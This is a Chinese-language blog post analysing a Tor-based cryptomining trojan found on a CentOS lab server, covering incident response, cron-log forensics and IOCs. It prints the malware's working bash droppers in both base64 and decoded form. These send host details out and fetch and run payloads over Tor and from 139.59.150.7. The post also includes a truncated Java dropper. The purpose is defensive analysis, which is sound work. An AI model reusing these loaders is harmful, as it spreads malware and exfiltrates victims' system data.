又一起挖矿木马排查

挖矿的木马都这么努力,你还有什么理由摸鱼呢。

Posted by Les1ie on July 12, 2021

组里有同学说他们机器被攻击了 :(

出现的问题是有个进程占满了 cpu,并且干不掉他

那么开搞 :)

分析

登录之后看到了熟悉的随机字符串为文件名的占满了 CPU 的程序

先想到了上次帮曾大佬同学看的那台机器,于是直奔主题,看看 systemd 里面是谁把他拉起来的

● session-7.scope - Session 7 of user root
   Loaded: loaded (/run/systemd/system/session-7.scope; static; vendor preset: disabled)
  Drop-In: /run/systemd/system/session-7.scope.d
           └─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions\x2eservice.conf, 50-Description.conf, 50-SendSIGHUP.conf, 50-Slice.conf, 50-TasksMax.con
f
   Active: active (abandoned) since 一 2021-07-12 10:05:01 CST; 4h 52min ago
   CGroup: /user.slice/user-0.slice/session-7.scope
           ├─2075 tOAK5Ejl
           ├─2402 tracepath
           └─3226 LDi4ZYIl

7月 12 14:47:44 localhost.localdomain crontab[21477]: (root) LIST (root)
7月 12 14:49:45 localhost.localdomain crontab[21591]: (root) LIST (root)
7月 12 14:49:46 localhost.localdomain crontab[21654]: (root) LIST (root)
7月 12 14:49:46 localhost.localdomain crontab[21663]: (root) LIST (root)
7月 12 14:51:48 localhost.localdomain crontab[21780]: (root) LIST (root)
7月 12 14:55:50 localhost.localdomain crontab[21971]: (root) LIST (root)
7月 12 14:55:50 localhost.localdomain crontab[21979]: (root) LIST (root)
7月 12 14:57:51 localhost.localdomain crontab[22227]: (root) REPLACE (root)
7月 12 14:57:51 localhost.localdomain crontab[22230]: (root) REPLACE (root)
7月 12 14:57:52 localhost.localdomain crontab[22289]: (root) LIST (root)

真不巧,看起来不是注册到 systemd 的,那么是谁拉起来的呢?

啊,是 crontab(这在我写这篇文章的时候才注意到)

非常不巧,我当时一心想找是哪个 service,没注意到 crontab 的存在,还以为上次的那个挖矿木马换了个 service 的名字,还去这个路径找了好久,找了半天也没有看到恶意的 service 啊

突然想到我还没看 crontab

于是打开crontab

发现了一条指令

他静静的呆在那里

像是在嘲笑我太菜了,这个套路都没注意到 :P

于是,注释掉这行,然后对着刚刚 systemd 输出的三个进程一顿 kill

           ├─2075 tOAK5Ejl
           ├─2402 tracepath
           └─3226 LDi4ZYIl

再看看负载,瞬间安静了下来

似乎暂时搞定了,不排除还有其他后手(事后想想,当时的直觉还是对的hh

不过现在有线索了,去看看恶意文件的内容

[[email protected] ~]# cat .systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh
#!/bin/bash
exec &>/dev/null
echo jeAozqLbO5Ni2rtDL7lwAMXluzYQMl
echo amVBb3pxTGJPNU5pMnJ0REw3bHdBTVhsdXpZUU1sCmV4ZWMgJj4vZGV2L251bGwKZXhwb3J0IFBBVEg9JFBBVEg6JEhPTUU6L2Jpbjovc2JpbjovdXNyL2JpbjovdXNyL3NiaW46L3Vzci9sb2NhbC9iaW46L3Vzci9sb2Nh
bC9zYmluCgpkPSQoZ3JlcCB4OiQoaWQgLXUpOiAvZXRjL3Bhc3N3ZHxjdXQgLWQ6IC1mNikKYz0kKGVjaG8gImN1cmwgLTRmc1NMa0EtIC1tMjAwIikKdD0kKGVjaG8gImJnZ3RzNTQ3Z3VraHZtZjRjZ2FuZGxneHhwaGVuZ3hvd
m95bzZld2huczVxbW1iMmI1b2k0M3lkIikKCnNvY2t6KCkgewpuPShkb2gudGhpcy53ZWIuaWQgZG9oLnBvc3QtZmFjdHVtLnRrIGRucy5ob3N0dXgubmV0IHVuY2Vuc29yZWQubHV4MS5kbnMubml4bmV0Lnh5eiBkbnMucnVieW
Zpc2guY24gZG5zLnR3bmljLnR3IGRvaC1maS5ibGFoZG5zLmNvbSBmaS5kb2guZG5zLnNub3B5dGEub3JnIHJlc29sdmVyLWV1LmxlbHV4LmZpIGRvaC5saSBkbnMuZGlnaXRhbGUtZ2VzZWxsc2NoYWZ0LmNoKQpwPSQoZWNobyA
iZG5zLXF1ZXJ5P25hbWU9cmVsYXkudG9yMnNvY2tzLmluIikKcz0kKCRjIGh0dHBzOi8vJHtuWyQoKFJBTkRPTSUxMSkpXX0vJHAgfCBncmVwIC1vRSAiXGIoWzAtOV17MSwzfVwuKXszfVswLTldezEsM31cYiIgfHRyICcgJyAn
XG4nfGdyZXAgLUV2IFsuXTB8c29ydCAtdVJ8aGVhZCAtbiAxKQp9CgpmZXhlKCkgewpmb3IgaSBpbiAuICRIT01FIC91c3IvYmluICRkIC92YXIvdG1wIDtkbyBlY2hvIGV4aXQgPiAkaS9pICYmIGNobW9kICt4ICRpL2kgJiYgY
2QgJGkgJiYgLi9pICYmIHJtIC1mIGkgJiYgYnJlYWs7ZG9uZQp9Cgp1KCkgewpzb2NregpmPS9pbnQuJCh1bmFtZSAtbSkKeD0uLyQoZGF0ZXxtZDVzdW18Y3V0IC1mMSAtZC0pCnI9JChjdXJsIC00ZnNTTGsgY2hlY2tpcC5hbW
F6b25hd3MuY29tfHxjdXJsIC00ZnNTTGsgaXAuc2IpXyQod2hvYW1pKV8kKHVuYW1lIC1tKV8kKHVuYW1lIC1uKV8kKGlwIGF8Z3JlcCAnaW5ldCAnfGF3ayB7J3ByaW50ICQyJ318bWQ1c3VtfGF3ayB7J3ByaW50ICQxJ30pXyQ
oY3JvbnRhYiAtbHxiYXNlNjQgLXcwKQokYyAteCBzb2NrczVoOi8vJHM6OTA1MCAkdC5vbmlvbiRmIC1vJHggLWUkciB8fCAkYyAkMSRmIC1vJHggLWUkcgpjaG1vZCAreCAkeDskeDtybSAtZiAkeAp9Cgpmb3IgaCBpbiB0b3Iy
d2ViLmluIHRvcjJ3ZWIuaXQKZG8KaWYgISBscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzOyB0aGVuCmZleGU7dSAkdC4kaApscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wM
Skvc3RhdHVzIHx8IChjZCAvdG1wO3UgJHQuJGgpCmxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXMgfHwgKGNkIC9kZXYvc2htO3UgJHQuJGgpCmVsc2UKYnJlYWsKZmkKZG9uZQo=|base64 -d
|bash

并不简短的程序,主要内容是一个用 base64 编码后的命令,解开之后内容如下:

jeAozqLbO5Ni2rtDL7lwAMXluzYQMl
exec &>/dev/null
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
c=$(echo "curl -4fsSLkA- -m200")
t=$(echo "bggts547gukhvmf4cgandlgxxphengxovoyo6ewhns5qmmb2b5oi43yd")

sockz() {
n=(doh.this.web.id doh.post-factum.tk dns.hostux.net uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh-fi.blahdns.com fi.doh.dns.snopyta.org resolver-eu.lelux.
fi doh.li dns.digitale-gesellschaft.ch)
p=$(echo "dns-query?name=relay.tor2socks.in")
s=$($c https://${n[$((RANDOM%11))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|head -n 1)
}

fexe() {
for i in . $HOME /usr/bin $d /var/tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done
}

u() {
sockz
f=/int.$(uname -m)
x=./$(date|md5sum|cut -f1 -d-)
r=$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base
64 -w0)
$c -x socks5h://$s:9050 $t.onion$f -o$x -e$r || $c $1$f -o$x -e$r
chmod +x $x;$x;rm -f $x
}

for h in tor2web.in tor2web.it
do
if ! ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status; then
fexe;u $t.$h
ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /tmp;u $t.$h)
ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /dev/shm;u $t.$h)
else
break
fi
done

第一行随机字符串是干嘛的,我暂且不知道,这样应该会失败吧..

也不一定,除非,除非这是个可执行文件 :)

那么搜一下有没有这个可执行文件

find / 2>/dev/null |grep jeAozqLbO5Ni2rtDL7lwA

发现了另外的有趣的东西

再仔细看看,好家伙,还有后手

更坏的消息是,现在应该刚过了15:29,可能他又启动了

再看一看进程列表,果然。

要不是我想着摸鱼写一篇文章记录下,我可能就已经跑路,看不到这个剧情了 :)

这次不能轻易的放过他了 :)

先不急着杀掉他,把他的二进制搞出来分析分析

虽然文件被删了,但是他的文件描述符还在,所以直接把他复制出来看看,我觉得又可以丢给曾大佬玩了 :)

小插曲解决掉了,那么继续分析 bash 脚本。

为了方便阅读,我替换了一些变量名,原始的 bash 脚本可以看前面解码的内容 :)

sockz() {
n=(doh.this.web.id doh.post-factum.tk dns.hostux.net uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh-fi.blahdns.com fi.doh.dns.snopyta.org resolver-eu.lelux.
fi doh.li dns.digitale-gesellschaft.ch)
p=$(echo "dns-query?name=relay.tor2socks.in")
s=$($c https://${n[$((RANDOM%11))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|head -n 1)
}

sockz函数看起来是想要通过 doh 查询 ip,这一招可以说是很妙了,直接绕过了各大厂商IDS里面恶意域名的 IOC。其中 dns.rubyfish.cn 这个域名,以及后面出现的ip.sb,这两个域名在国内的互联网圈子里面可能比较流行,暂不清楚在国外的知名度有多少。所以我可能比较倾向于这个挖矿木马是国内的黑产团队搞的。

fexe() {
for i in . $HOME /usr/bin /root /var/tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done
}

fexe 看起来是在这几个路径里面寻找一个有读写权限的路径。

u() {
sockz
f=/int.$(uname -m)
x=./$(date|md5sum|cut -f1 -d-)
r=$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base
64 -w0)
curl -x socks5h://$s:9050 bggts547gukhvmf4cgandlgxxphengxovoyo6ewhns5qmmb2b5oi43yd.onion$f -oevil_file_name -e$r || curl $1$f -oevil_file_name -e$r
chmod +x evil_file_name;evil_file_name;rm -f evil_file_name
}

函数 u() 是主要内容了,他生成了随机的文件名,通过 tor 代理,根据设备的架构下载了一个恶意文件/int.$(uname -m),如/int.x86_64,然后执行这个恶意文件并且删除他。

$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base
64 -w0)

这一行把设备的一些基本信息打包了一下,包括 ip地址、主机名、crontab内容。这里是 or 的关系,推测是如果执行失败那就上报设备信息。

for h in tor2web.in tor2web.it
do
if ! ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status; then
fexe;u $t.$h
ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /tmp;u $t.$h)
ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /dev/shm;u $t.$h)
else
break
fi
done

程序执行流程就比较容易看懂,根据 pid 文件判断程序是否启动了,如果没启动,那么就启动程序。

二进制文件分析

这个二进制文件什么都过滤不出来,但是过滤出来了一个字符串:

PROT_EXEC|PROT_WRITE failed.

搜一下这个字符串,可以发现有人在 stackoverflow 提了这样一个问题,问题的内容里面有这个关键字

$strings exe_file
UPX!
.....
PROT_EXEC|PROT_WRITE failed.
$Info: This file is packed with the UPX executable packer http://upx.sf.net $
$Id: UPX 3.91 Copyright (C) 1996-2013 the UPX Team. All Rights Reserved. $

看到了 upx 不禁眼前一亮,我之前就猜测这是 upx 加壳了,但是去除了 upx 的特征,导致过滤不出任何关键字来。

那么 upx -d 一把梭

非常棒,不能一键脱壳,那么我搞不动了 :)

找了些 upx 去特征的帖子,看了后我不想动手了,太多可以玩的地方了

首先,他可能去掉了一些 upx 识别自己压缩过的特征字符串,不过这个可以自己新建一个 upx 文件把内容复制过来。

其次,我不知道他是哪一种压缩等级,不过这个可以枚举解决,只是可能会花点时间。

最重要的一点,又到了组会的时候了,我不能再摸鱼了,不然导师问我干了啥,我又啥也没干 :)

这个问题暂时就不搞了 :)

入侵溯源

那么对面是怎么打进来的呢?

centos7有记录 crontab 日志的地方,查看 crontab 的编辑记录就知道是在9号下午 12:55:01 首次编辑 crontab 的

[[email protected] log]# cat cron*|grep RELOAD
Jul 12 12:38:01 localhost crond[12721]: (root) RELOAD (/var/spool/cron/root)
Jul 12 15:08:01 localhost crond[22892]: (root) RELOAD (/var/spool/cron/root)
Jul 12 15:34:01 localhost crond[25783]: (root) RELOAD (/var/spool/cron/root)
Jul  9 12:55:01 localhost crond[2554]: (root) RELOAD (/var/spool/cron/root)
Jul  9 14:30:01 localhost crond[15227]: (root) RELOAD (/var/spool/cron/root)
Jul  9 15:37:01 localhost crond[24166]: (root) RELOAD (/var/spool/cron/root)

那么,从2021.6.13 开始,到2021.7.12,执行的crontab的记录再反复过滤,运用人工的启发式搜索算法 :)

Jul 12 10:29:01 localhost CROND[4295]: (root) CMD (/opt/systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &)Jul 12 11:29:01 localhost CROND[8070]: (root) CMD (/opt/systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &)
Jul 12 12:05:01 localhost CROND[10604]: (root) CMD (/root/.systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &)
Jul 12 12:29:01 localhost CROND[12158]: (root) CMD (/opt/systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &)
Jul 12 13:05:01 localhost CROND[14585]: (root) CMD (/root/.systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &)
Jul 12 14:05:01 localhost CROND[18502]: (root) CMD (/root/.systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &)
Jul 12 14:29:01 localhost CROND[20237]: (root) CMD (/opt/systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &)
Jul 12 15:05:01 localhost CROND[22744]: (root) CMD (/root/.systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &)
Jul 12 15:07:13 localhost crontab[22899]: (root) BEGIN EDIT (root)
Jul 12 15:07:17 localhost crontab[22899]: (root) END EDIT (root)
Jul 12 15:29:01 localhost CROND[24501]: (root) CMD (/opt/systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &)
Jul 12 15:46:14 localhost crontab[28007]: (root) BEGIN EDIT (root)
Jul 12 15:46:30 localhost crontab[28152]: (root) BEGIN EDIT (root)
Jul 12 15:46:33 localhost crontab[28152]: (root) END EDIT (root)
Jun 15 03:42:01 localhost anacron[24559]: Job `cron.weekly' started
Jun 22 03:00:01 localhost anacron[7132]: Job `cron.weekly' started
Jun 22 03:01:01 localhost anacron[7216]: Job `cron.monthly' locked by another anacron - skipping
Jun 22 03:20:01 localhost anacron[7132]: Job `cron.monthly' started
Jun 29 03:29:01 localhost anacron[31965]: Job `cron.weekly' started
Jul  6 03:42:01 localhost anacron[20977]: Job `cron.weekly' started
Jul  9 12:48:01 localhost crond[723]: (CRON) bad minute (/etc/cron.d/systemdd)
Jul  9 12:48:01 localhost crond[723]: (CRON) bad minute (/etc/cron.d/systemdd)
Jul  9 12:48:01 localhost crond[723]: (CRON) bad minute (/etc/cron.d/systemdd)
Jul  9 12:48:01 localhost CROND[388]: (root) CMD (curl -fsS 139.59.150.7:443/rl|sh)
Jul  9 12:48:01 localhost CROND[389]: (root) CMD (wget -qO- 139.59.150.7:443/rl|sh)
Jul  9 12:48:02 localhost CROND[384]: (root) CMDOUT (sh: line 1: XRANDOM: command not found)
Jul  9 12:48:02 localhost CROND[383]: (root) CMDOUT (sh: line 1: XRANDOM: command not found)
Jul  9 13:05:02 localhost CROND[3957]: (root) CMD (/root/.systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &)
Jul  9 13:29:01 localhost CROND[6672]: (root) CMD (/opt/systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &)
Jul  9 13:33:59 localhost crond[7505]: (CRON) bad minute (/etc/cron.d/systemdd)
Jul  9 13:33:59 localhost crond[7505]: (CRON) bad minute (/etc/cron.d/systemdd)
Jul  9 13:33:59 localhost crond[7505]: (CRON) bad minute (/etc/cron.d/systemdd)
Jul  9 13:35:01 localhost CROND[7580]: (root) CMD (wget -qO- 139.59.150.7:443/rl|sh)
Jul  9 13:35:01 localhost CROND[7581]: (root) CMD (curl -fsS 139.59.150.7:443/rl|sh)
Jul  9 13:35:02 localhost CROND[7577]: (root) CMDOUT (sh: line 1: XRANDOM: command not found)
Jul  9 13:35:03 localhost CROND[7576]: (root) CMDOUT (sh: line 1: XRANDOM: command not found)
Jul  9 14:05:01 localhost CROND[11627]: (root) CMD (/root/.systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &)
Jul  9 14:29:04 localhost CROND[15270]: (root) CMD (/opt/systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &)
Jul  9 16:05:02 localhost CROND[28101]: (root) CMD (/root/.systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &)
Jul  9 16:29:03 localhost CROND[30857]: (root) CMD (/opt/systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &)
Jul  9 18:05:01 localhost CROND[9615]: (root) CMD (/root/.systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &)
Jul  9 18:29:01 localhost CROND[12804]: (root) CMD (/opt/systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &)
Jul 12 10:05:01 localhost CROND[2015]: (root) CMD (/root/.systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &)

重点关注两个关键的时间节点

Jul  9 12:48:01 localhost CROND[388]: (root) CMD (curl -fsS 139.59.150.7:443/rl|sh)
Jul  9 12:48:01 localhost CROND[389]: (root) CMD (wget -qO- 139.59.150.7:443/rl|sh)
Jul  9 13:05:02 localhost CROND[3957]: (root) CMD (/root/.systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &)

在执行目前的挖矿程序之前,攻击者首先执行了

curl -fsS 139.59.150.7:443/rl|sh

内容如下

XRANDOM
exec &>/dev/null
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

function kurl() {
  read proto server path <<<$(echo ${1//// })
  DOC=/${path// //}
  HOST=${server//:*}
  PORT=${server//*:}
  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80

  exec 3<>/dev/tcp/${HOST}/$PORT
  echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
  (while read line; do
   [[ "$line" == $'\r' ]] && break
  done && cat) <&3
  exec 3>&-
}

rm -f $HOME/ss
curl -V || wget -q https://github.com/moparisthebest/static-curl/releases/download/v7.75.0/curl-amd64 -O $HOME/curl;chmod +x $HOME/curl
curl -V || kurl http://139.59.150.7:443/curl > $HOME/curl;chmod +x $HOME/curl
ss -v   || kurl http://139.59.150.7:443/ss   > $HOME/ss;chmod +x $HOME/ss
ss -v   || curl -s http://139.59.150.7:443/ss -o $HOME/ss;chmod +x $HOME/ss
ps      || curl -s http://139.59.150.7:443/ps -o $HOME/ps;chmod +x $HOME/ps

d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
c=$(echo "curl -4fsSLkA- -m200")
t=$(echo "rxmxpzfkydkulhhqnuftbmf6d5q67jjchopmh4ofszfwwnmz4bqq2fid")

sockz() {
n=(doh.defaultroutes.de dns.hostux.net uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.centraleu.pi-dns.com doh.dns.sb doh-fi.blahdns.com fi.doh.dns.snopyta.org dns.flatuslifir.is doh.li dns.digitale-gesellschaft.ch)
p=$(echo "dns-query?name=relay.tor2socks.in")
s=$($c https://${n[$((RANDOM%10))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|head -n 1)
}

fexe() {
for i in . $HOME /usr/bin $d /tmp /var/tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done
}

u() {
sockz
f=/l/rd.$(uname -m)
x=./$(date|md5sum|cut -f1 -d-)
r=$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base64 -w0)
$c -x socks5h://$s:9050 $t.onion$f -o$x -e$r || $c $1$f -o$x -e$r
chmod +x $x;$x;rm -f $x
}

for h in tor2web.in tor2web.it onion.foundation onion.com.de onion.sh tor2web.su
do
if ! ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status; then
fexe;u $t.$h
ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /tmp;u $t.$h)
ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /dev/shm;u $t.$h)
else
break
fi
done
rm -f /etc/cron.d/systemdd

内容和分析过的脚本差不多,没有什么新的消息。

奇安信 ti 和微步在线没有关于 139.59.150.7 更多的比较有用的信息了。

查了下 ssh 记录,只保留了最近一周多的记录,之前的记录没了,口令也不是弱口令啊 :(

注意到机器开了 6379

试了下,redis 没密码 :)

但是真的是 redis 打进来的么,看看 redis的执行记录

cat ~/.rediscli_history

里面没有用到和 config 等可疑的命令,意味着攻击者可能没有用 redis 的洞打进来,或者打进来了然后删除了记录,个人感觉使用 redis 洞的概率较小

那么攻击者到底如何进来的,目前还是未解之谜 :)

这个攻击者为了规避监测,做了不少的工作,让人感觉稍微比以前分析过的黑产有意思一点了。刚开始分析的时候觉得他的恶意程序太长了,但是仔细分析可以知道他们的为了规避审而做的隐藏还是很有价值的,包括使用 doh 解析域名, tor 代理下载恶意文件,应该能成功绕过 IDS 的审查。

看完代码,感觉这可能不只是挖矿这么简单,他的载荷任意修改就可以变成对抗一般的 IDS 的战略武器了

要说这是APT我都信,不过这似乎的确是个挖矿程序 :)

看起来应该不是白象的攻击,APT 以钓鱼为主,重点在隐蔽,不会大张旗鼓的搞挖矿。

既然有 tor 域名,那么这可以当作一个 IOC,去网上搜一搜,发现不少这样的案例

bggts547gukhvmf4cgandlgxxphengxovoyo6ewhns5qmmb2b5oi43yd

https://cloud.tencent.com/developer/article/1731875

https://www.zscaler.com/blogs/security-research/dreambus-botnet-technical-analysis

https://www.trendmicro.com/en_us/research/21/d/tor-based-botnet-malware-targets-linux-systems-abuses-cloud-management-tools.html

值得注意的是, zscaler 的样本似乎比我拿到的样本功能更多, zscaler 的样本包括了通过 ssh/redis/postgres/hadoop/spark等横向移动的功能。推测可能是其他设备上有包含这种功能的木马攻破我分析的这台设备后放置了一个功能更单一的木马,以规避安全人员的入侵分析。2021.7.20 注:写这篇文章的时候没发现这几个横向移动的功能,事后分析发现了这几个移动方式。

复制出来的恶意文件的IOC也在微步在线有看到

删木马用了3分钟,写博客用了3小时 :)

我感觉导师要找我交流进度了

我又只有说我摸鱼了 555555

附IOC如下:

$ md5sum *
1903a412002ed21dd7d90858f46717ca  EQnR3jNR
f411ce55ff4b6ae95d11944a0c8d594b  tracepath
48b164b19a85b94be0548c542d315e31  yitxXFrW
$ sha256sum *
a33a641e1c866164930a5acf934231fc9896a5ad5e47bbf0784f65430e86f0dd  EQnR3jNR
c38c6d9ddf08ee411bedb00cc5bfd03f78af774ff408ab160e6149607bc76046  tracepath
cdf9ddd2f3eac918aa25c507d7b121ba670f241e5647b23e645a9f9e35f9665a  yitxXFrW

恶意文件分析

他来了,曾大佬真的来了。

曾大佬出手,分分钟拿下。

什么加壳去特征,都不是问题,曾大佬动态调试全带走 :)

我问他怎么还有时间搞这个,他说要不是不想看论文,谁会去分析这个挖矿木马呢?

这句话怎么似曾相似,啊,原来是我刚开始写这篇博客的时候也是这样说的 :P

tracepath

包含了横向移动的功能。

如果发现有 spark 节点,那么提交一个任务上去。

http://139.59.150.7:443/z.jar 下载 z.jar,提交上去。

那么,z.jar 是什么呢?目前还可以从这个ip地址上下载这个恶意文件。

丢进 jd-gui,看到文件的 java 代码

public class z {
  public static void main(String[] paramArrayOfString) throws Exception {
    String[] arrayOfString = new String[3];
    arrayOfString[0] = "/bin/sh";
    arrayOfString[1] = "-c";
    arrayOfString[2] = "echo WFJBTkRPTQpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZnVuY3Rpb24ga3VybCgpIHsKICByZWFkIHByb3RvIHNlcnZlciBwYXRoIDw8PCQoZWNobyAkezEvLy8vIH0pCiAgRE9DPS8ke3BhdGgvLyAvL30KICBIT1NUPSR7c2VydmVyLy86Kn0KICBQT1JUPSR7c2VydmVyLy8qOn0KICBbWyB4IiR7SE9TVH0iID09IHgiJHtQT1JUfSIgXV0gJiYgUE9SVD04MAoKICBleGVjIDM8Pi9kZXYvdGNwLyR7SE9TVH0vJFBPUlQKICBlY2hvIC1lbiAiR0VUICR7RE9DfSBIVFRQLzEuMFxyXG5Ib3N0OiAke0hPU1R9XHJcblxyXG4iID4mMwogICh3aGlsZSByZWFkIGxpbmU7IGRvCiAgIFtbICIkbGluZSIgPT0gJCdccicgXV0gJiYgYnJlYWsKICBkb25lICYmIGNhdCkgPCYzCiAgZXhlYyAzPiYtCn0KCnJtIC1mICRIT01FL3NzCmN1cmwgLVYgfHwgd2dldCAtcSBodHRwczovL2dpdGh1Yi5jb20vbW9wYXJpc3RoZWJlc3Qvc3RhdGljLWN1cmwvcmVsZWFzZXMvZG93bmxvYWQvdjcuNzUuMC9jdXJsLWFtZDY0IC1PICRIT01FL2N1cmw7Y2htb2QgK3ggJEhPTUUvY3VybApjdXJsIC1WIHx8IGt1cmwgaHR0cDovLzEzOS41OS4xNTAuNzo0NDMvY3VybCA+ICRIT01FL2N1cmw7Y2htb2QgK3ggJEhPTUUvY3VybApzcyAtdiAgIHx8IGt1cmwgaHR0cDovLzEzOS41OS4xNTAuNzo0NDMvc3MgICA+ICRIT01FL3NzO2NobW9kICt4ICRIT01FL3NzCnNzIC12ICAgfHwgY3VybCAtcyBodHRwOi8vMTM5LjU5LjE1MC43OjQ0My9zcyAtbyAkSE9NRS9zcztjaG1vZCAreCAkSE9NRS9zcwpwcyAgICAgIHx8IGN1cmwgLXMgaHR0cDovLzEzOS41OS4xNTAuNzo0NDMvcHMgLW8gJEhPTUUvcHM7Y2htb2QgK3ggJEhPTUUvcHMKCmQ9JChncmVwIHg6JChpZCAtdSk6IC9ldGMvcGFzc3dkfGN1dCAtZDogLWY2KQpjPSQoZWNobyAiY3VybCAtNGZzU0xrQS0gLW0yMDAiKQp0PSQoZWNobyAicnhteHB6Zmt5ZGt1bGhocW51ZnRibWY2ZDVxNjdqamNob3BtaDRvZnN6Znd3bm16NGJxcTJmaWQiKQoKc29ja3ooKSB7Cm49KGRvaC5ubC5haGFkbnMubmV0IGRucy5ob3N0dXgubmV0IHVuY2Vuc29yZWQubHV4MS5kbnMubml4bmV0Lnh5eiBkbnMucnVieWZpc2guY24gZG5zLnR3bmljLnR3IGRvaC5uby5haGFkbnMubmV0IGRvaC1maS5ibGFoZG5zLmNvbSBmaS5kb2guZG5zLnNub3B5dGEub3JnIHJlc29sdmVyLWV1LmxlbHV4LmZpIGRvaC5saSBkbnMuZGlnaXRhbGUtZ2VzZWxsc2NoYWZ0LmNoKQpwPSQoZWNobyAiZG5zLXF1ZXJ5P25hbWU9cmVsYXkudG9yMnNvY2tzLmluIikKcz0kKCRjIGh0dHBzOi8vJHtuWyQoKFJBTkRPTSUxMSkpXX0vJHAgfCBncmVwIC1vRSAiXGIoWzAtOV17MSwzfVwuKXszfVswLTldezEsM31cYiIgfHRyICcgJyAnXG4nfGdyZXAgLUV2IFsuXTB8c29ydCAtdVJ8aGVhZCAtbiAxKQp9CgpmZXhlKCkgewpmb3IgaSBpbiAuICRIT01FIC91c3IvYmluICRkIC90bXAgL3Zhci90bXAgO2RvIGVjaG8gZXhpdCA+ICRpL2kgJiYgY2htb2QgK3ggJGkvaSAmJiBjZCAkaSAmJiAuL2kgJiYgcm0gLWYgaSAmJiBicmVhaztkb25lCn0KCnUoKSB7CnNvY2t6CmY9L2wvc3AuJCh1bmFtZSAtbSkKeD0uLyQoZGF0ZXxtZDVzdW18Y3V0IC1mMSAtZC0pCnI9JChjdXJsIC00ZnNTTGsgY2hlY2tpcC5h